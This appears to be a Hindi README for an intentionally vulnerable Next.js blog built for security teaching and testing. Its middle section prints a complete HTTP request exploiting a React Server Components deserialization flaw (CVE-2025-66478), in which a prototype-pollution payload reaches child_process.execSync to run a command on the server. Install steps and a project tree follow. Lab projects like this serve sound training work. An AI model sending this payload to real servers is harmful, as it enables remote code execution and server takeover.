
महत्वपूर्ण: शैक्षिक, परीक्षण और शोषण उद्देश्यों के लिए बनाया गया एक Next JS VULNERABLE प्रोजेक्ट, उत्पादन में स्थापना की अनुशंसा नहीं की जाती है, केवल स्थानीय या नियंत्रित वातावरण के लिए।
Next.js 16, React 19, shadcn/ui और Tailwind CSS के साथ बनाया गया एक आधुनिक और सुंदर ब्लॉग।
Next JS VULNERABLE परियोजना केवल शैक्षिक उद्देश्यों, परीक्षण और शोषण के लिए बनाई गई है, उत्पादन में स्थापना की अनुशंसा नहीं की जाती, केवल स्थानीय या नियंत्रित वातावरण के लिए
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Reference: github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478
npm install
# या
yarn install
# या
pnpm install
npm run dev
# या
yarn dev
# या
pnpm dev
├── app/ # Next.js पृष्ठ
│ ├── blog/[id]/ # ब्लॉग विवरण पृष्ठ
│ ├── profile/ # प्रोफ़ाइल पृष्ठ
│ ├── layout.tsx # मुख्य लेआउट
│ └── page.tsx # मुख्य पृष्ठ
├── components/ # React घटक
│ ├── auth/ # प्रमाणीकरण घटक
│ ├── blog/ # ब्लॉग घटक
│ ├── layout/ # लेआउट घटक
│ └── ui/ # shadcn/ui घटक
├── lib/ # उपयोगिताएँ और सेवाएँ
│ ├── auth.ts # प्रमाणीकरण सेवा
│ ├── mocks.ts # मॉक डेटा
│ └── utils.ts # सामान्य उपयोगिताएँ
└── public/ # स्थैतिक फ़ाइलें
सभी डेटा (ब्लॉग, उपयोगकर्ता, प्रतिक्रियाएँ) पूरी तरह से मॉक हैं और गतिशील रूप से उत्पन्न होते हैं। किसी डेटाबेस की आवश्यकता नहीं है।
यह परियोजना केवल शैक्षिक उद्देश्यों के लिए है।